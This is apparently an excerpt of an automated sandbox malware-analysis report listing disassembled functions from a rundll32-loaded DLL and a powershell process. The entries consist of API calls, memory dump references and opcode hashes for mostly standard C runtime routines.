                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                              • API String ID: 0-2837366778
                                                                                              • Opcode ID: 7093d26e3bcd0a76f563be69a49bf652ea50337e476722be6443040e14dea071
                                                                                              • Instruction ID: f5099c33aa2d3aa726690310821c457c84d902b0ddc6528292d34e38c1b57a36
                                                                                              • Opcode Fuzzy Hash: 7093d26e3bcd0a76f563be69a49bf652ea50337e476722be6443040e14dea071
                                                                                              • Instruction Fuzzy Hash: B121D17561420EAFDB129FE58C81D9B77AFEF0136A7408A34FA14D7158EB31EC0087A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E228627 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 0-2084034818
                                                                                              • Opcode ID: 43abe2299d3bbc2ea8c544cccf27b686b8ff1e795492a2fdffeb7c016fc99c7f
                                                                                              • Instruction ID: 451869a1ffc581a4cdb0eae8b763074e037e732348fd1a6eb84fb96a20de04c6
                                                                                              • Opcode Fuzzy Hash: 43abe2299d3bbc2ea8c544cccf27b686b8ff1e795492a2fdffeb7c016fc99c7f
                                                                                              • Instruction Fuzzy Hash: 34112E71A5562AAFCB394EE9AC44E6E376B9F027A1B110570ED15B7380D770DD01CAF0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E229F64 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E229F16,?,?,6E229EDE,?,00000001,?), ref: 6E229F79
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E229F8C
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6E229F16,?,?,6E229EDE,?,00000001,?), ref: 6E229FAF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 9dda5a022492e0373a9a09096a30e670059058f5c57cf6df4a656ee67e683cdd
                                                                                              • Instruction ID: 90595ecad51af422edfa82a14b368435d392d5a9631efd38cfc17e14aecdfac2
                                                                                              • Opcode Fuzzy Hash: 9dda5a022492e0373a9a09096a30e670059058f5c57cf6df4a656ee67e683cdd
                                                                                              • Instruction Fuzzy Hash: B1F05830A0491EFFDB519BD1CC0DB9D7BBBAB01656F1000A4A800A2250DB76CE12DEA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22DFCB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 6E22DFE3
                                                                                                • Part of subcall function 6E22B59F: HeapFree.KERNEL32(00000000,00000000,?,6E22A79C), ref: 6E22B5B5
                                                                                                • Part of subcall function 6E22B59F: GetLastError.KERNEL32(?,?,6E22A79C), ref: 6E22B5C7
                                                                                              • _free.LIBCMT ref: 6E22DFF5
                                                                                              • _free.LIBCMT ref: 6E22E007
                                                                                              • _free.LIBCMT ref: 6E22E019
                                                                                              • _free.LIBCMT ref: 6E22E02B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: d0b946e6220ccb7a4e180d1b18734d4be8c46e3b411e88b885d1749429fe1ce2
                                                                                              • Instruction ID: 64815a96750526c55078d9f0bf6acd0ce3bbb67c9fb01b5808e26f905fda7846
                                                                                              • Opcode Fuzzy Hash: d0b946e6220ccb7a4e180d1b18734d4be8c46e3b411e88b885d1749429fe1ce2
                                                                                              • Instruction Fuzzy Hash: 34F0C436508F0A9FCA609FB8E499C5A73DFAA097157601825E458EF589CB20FD818EF4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E227669 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer
                                                                                              • String ID:
                                                                                              • API String ID: 1740715915-0
                                                                                              • Opcode ID: 705628969ed35900566f590c6d003c3492ba9d56d981e780cd27ea8574822575
                                                                                              • Instruction ID: 964e77bfe71c24c9794444d3dcba8c4a302a953c764c965b3abf431252c9b5dc
                                                                                              • Opcode Fuzzy Hash: 705628969ed35900566f590c6d003c3492ba9d56d981e780cd27ea8574822575
                                                                                              • Instruction Fuzzy Hash: FD51AC7660960F9FEB198FD5D890BAA73B7AF05315F204539E8118B2E0E735E880CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22B6A3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6E22BCC5: _free.LIBCMT ref: 6E22BCD3
                                                                                                • Part of subcall function 6E22C89F: WideCharToMultiByte.KERNEL32(?,00000000,6E22D635,00000000,00000001,6E22D5C4,6E22F82C,?,6E22D635,?,00000000,?,6E22F59B,0000FDE9,00000000,?), ref: 6E22C941
                                                                                              • GetLastError.KERNEL32 ref: 6E22B70B
                                                                                              • __dosmaperr.LIBCMT ref: 6E22B712
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E22B751
                                                                                              • __dosmaperr.LIBCMT ref: 6E22B758
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                              • String ID:
                                                                                              • API String ID: 167067550-0
                                                                                              • Opcode ID: 3a7b1160288f7ad2ce0fb6e389992d81fc0f0aa9e8fdc6c8cdebc634ffceb604
                                                                                              • Instruction ID: e7fef3d23521df6a38cd1d0c09783631c103c71e61d1f432b55736efc6878d20
                                                                                              • Opcode Fuzzy Hash: 3a7b1160288f7ad2ce0fb6e389992d81fc0f0aa9e8fdc6c8cdebc634ffceb604
                                                                                              • Instruction Fuzzy Hash: 8A21B67661460E6FDB105FE68D81D5B77AFFF013697108938F81497258E731EC008760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22AF5C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,6E22F2E2,00000000,00000001,6E22D635,?,6E22F7A1,00000001,?,?,?,6E22D5C4,?,00000000), ref: 6E22AF61
                                                                                              • _free.LIBCMT ref: 6E22AFBE
                                                                                              • _free.LIBCMT ref: 6E22AFF4
                                                                                              • SetLastError.KERNEL32(00000000,00000006,000000FF,?,6E22F7A1,00000001,?,?,?,6E22D5C4,?,00000000,00000000,6E239E88,0000002C,6E22D635), ref: 6E22AFFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast_free
                                                                                              • String ID:
                                                                                              • API String ID: 2283115069-0
                                                                                              • Opcode ID: eef2833b6f041d3ad4b279e29aacd850282df68d481e8c1c9664a571386a1b2d
                                                                                              • Instruction ID: c32241184363057f069fdaeb4532150a234931542ec88fdbaaf32fc3c96df72e
                                                                                              • Opcode Fuzzy Hash: eef2833b6f041d3ad4b279e29aacd850282df68d481e8c1c9664a571386a1b2d
                                                                                              • Instruction Fuzzy Hash: 9C110AF6358A0E2FD7601AF54D84E5A275F9FC677A7200734F134AB1D4EFAA8C018920
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E2302B6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(?,?,6E22D635,00000000,?,?,6E22FD10,?,00000001,?,00000001,?,6E22F271,00000000,00000000,00000001), ref: 6E2302CD
                                                                                              • GetLastError.KERNEL32(?,6E22FD10,?,00000001,?,00000001,?,6E22F271,00000000,00000000,00000001,00000000,00000001,?,6E22F7C5,6E22D5C4), ref: 6E2302D9
                                                                                                • Part of subcall function 6E23029F: CloseHandle.KERNEL32(FFFFFFFE,6E2302E9,?,6E22FD10,?,00000001,?,00000001,?,6E22F271,00000000,00000000,00000001,00000000,00000001), ref: 6E2302AF
                                                                                              • ___initconout.LIBCMT ref: 6E2302E9
                                                                                                • Part of subcall function 6E230261: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E230290,6E22FCFD,00000001,?,6E22F271,00000000,00000000,00000001,00000000), ref: 6E230274
                                                                                              • WriteConsoleW.KERNEL32(?,?,6E22D635,00000000,?,6E22FD10,?,00000001,?,00000001,?,6E22F271,00000000,00000000,00000001,00000000), ref: 6E2302FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              • Opcode ID: 8508b5494eb2045fbc734675a29b5143e9c6f1498518048773cc7a045af2ae86
                                                                                              • Instruction ID: 6d7975eb01b283ff44d01c49244793d2a3ec236c0b497f451aa7387c3c7f8a8e
                                                                                              • Opcode Fuzzy Hash: 8508b5494eb2045fbc734675a29b5143e9c6f1498518048773cc7a045af2ae86
                                                                                              • Instruction Fuzzy Hash: FDF0F87A60052DBBCF721ED5CC08E8A3F67EB0A7A1B144050FA1996124D7728C21EFB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22A8DD Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 6E22A8E6
                                                                                                • Part of subcall function 6E22B59F: HeapFree.KERNEL32(00000000,00000000,?,6E22A79C), ref: 6E22B5B5
                                                                                                • Part of subcall function 6E22B59F: GetLastError.KERNEL32(?,?,6E22A79C), ref: 6E22B5C7
                                                                                              • _free.LIBCMT ref: 6E22A8F9
                                                                                              • _free.LIBCMT ref: 6E22A90A
                                                                                              • _free.LIBCMT ref: 6E22A91B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 027c03242618393588abbf6219aa8971a1516d59ce324fd6b099f030328ddcdb
                                                                                              • Instruction ID: 0cf8b33a5dfe4d1d2241eddadcc0f2fee9ebf3c34d3d4c36bc7851c127ccfcad
                                                                                              • Opcode Fuzzy Hash: 027c03242618393588abbf6219aa8971a1516d59ce324fd6b099f030328ddcdb
                                                                                              • Instruction Fuzzy Hash: 8BE07576440E749FCA316F65984E4953B27A74EF143058416F5441E21ACB721562EEF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E225AD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6E225AD5
                                                                                                • Part of subcall function 6E225D41: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E225D4D
                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 6E225C1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                              • String ID: string too long
                                                                                              • API String ID: 3990507346-2556327735
                                                                                              • Opcode ID: be4a12422099ce58854a7cb6ab8edea63a7d737cfb018cb25431246598c155fc
                                                                                              • Instruction ID: a5b5191733585114ae8f5fc5475fa5ed6fa6a4506ce5a2f9e6a33bb111595eac
                                                                                              • Opcode Fuzzy Hash: be4a12422099ce58854a7cb6ab8edea63a7d737cfb018cb25431246598c155fc
                                                                                              • Instruction Fuzzy Hash: 3E410472E0012D9FDB099FE8CC4099EB7ABEF44251B508679E816EB34CEB31DD108792
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E229FF2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                              • API String ID: 0-2837366778
                                                                                              • Opcode ID: f50c2c233efbc4265f000dd8188ca91ccd4d1d95f2de965e6c3fb58aba5812ad
                                                                                              • Instruction ID: a76260aa7dedd48c96a8f292f364f85d5d6df2d2afc3a5e73efe320a41912d3a
                                                                                              • Opcode Fuzzy Hash: f50c2c233efbc4265f000dd8188ca91ccd4d1d95f2de965e6c3fb58aba5812ad
                                                                                              • Instruction Fuzzy Hash: 454193B5E1061DAFDB21CFD9C885A9EBBFEEB89710F144476E4009B250D7B18A40DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E227C76 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E227C9B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 2118026453-2084237596
                                                                                              • Opcode ID: e9380d30a9c0ab18005f2d51d0a003730cb7bf9ed54dcc223debea5ac832c2c8
                                                                                              • Instruction ID: 01f46a1b73dc6acc3837845c3e178a445c818d4fb3c97fff40842c3150833c95
                                                                                              • Opcode Fuzzy Hash: e9380d30a9c0ab18005f2d51d0a003730cb7bf9ed54dcc223debea5ac832c2c8
                                                                                              • Instruction Fuzzy Hash: B941597290410EAFCF06CFE4CD80AEEBBB6BF48305F1445A9E914A7291D3359951DB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Executed Functions

                                                                                              Function 00007FFD9B7D55CD Relevance: .4, Instructions: 377COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2054289520.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b7d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9807106b4b5ee15c7b64272e2dbb775a7606470d06ed360b9d952607c97adb4d
                                                                                              • Instruction ID: cdd4a8b53288bf7670a8aa1e122d56e4093efc1ba57aca7fd3de616ac044ec9f
                                                                                              • Opcode Fuzzy Hash: 9807106b4b5ee15c7b64272e2dbb775a7606470d06ed360b9d952607c97adb4d
                                                                                              • Instruction Fuzzy Hash: E8C1B452A0FBC60FE766977818754A47FE09F936A0B1A03FBD099CB0F3E91869498351
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00007FFD9B717808 Relevance: .3, Instructions: 259COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2053895887.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b700000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e7ef33d17e1b26a0ff99136a14ee6a54a397eb801237172e16bbbfbb4d069cf2
                                                                                              • Instruction ID: 6283c2a64e2b59495e211ba77bbb524e86ad703d5a291f88d5baef10693c008a
                                                                                              • Opcode Fuzzy Hash: e7ef33d17e1b26a0ff99136a14ee6a54a397eb801237172e16bbbfbb4d069cf2
                                                                                              • Instruction Fuzzy Hash: AE71AC3070CE094FDB6CEA29D4A4A7573D2EF99304B15516DE09EC76E6CE24FC429B44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00007FFD9B7177C0 Relevance: .1, Instructions: 143COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2053895887.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b700000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 26fe242ad3d44889dc14d671bc40d6a555e5b2afd99314f4a5ee48c7905b845c
                                                                                              • Instruction ID: 40264d4c9107ea8a0969a5cfc67c9c8fc6981a355309db38b83638daa3951127
                                                                                              • Opcode Fuzzy Hash: 26fe242ad3d44889dc14d671bc40d6a555e5b2afd99314f4a5ee48c7905b845c
                                                                                              • Instruction Fuzzy Hash: 32312662B2DE4D0FE77896AC90A6BB5B3D1EB94310F41457EE09EC72E6DC08AD458350
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00007FFD9B7D572D Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2054289520.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b7d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae72793166d928d7af4848dab3a87dda72e4fbc391e78e9e1dc43a8db706cdbf
                                                                                              • Instruction ID: 0df9c78b3aeb134b36eab6c37362fe46fc8678bad9fb94d479069044509c1386
                                                                                              • Opcode Fuzzy Hash: ae72793166d928d7af4848dab3a87dda72e4fbc391e78e9e1dc43a8db706cdbf
                                                                                              • Instruction Fuzzy Hash: 7A318452A0FBC54FE722477848355A57FE0AF932A0B1A07FBD0E9CB0F3D91969098751
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00007FFD9B7033B5 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2053895887.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b700000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                              • Instruction ID: efd57b12a9564628d3edd6f80681bf16b1343040eea0cf32193a4ffd938b4297
                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                              • Instruction Fuzzy Hash: 5701A73021CB0D4FD748EF0CE051AA5B3E0FB89320F10056EE58AC36A1DA32E882CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%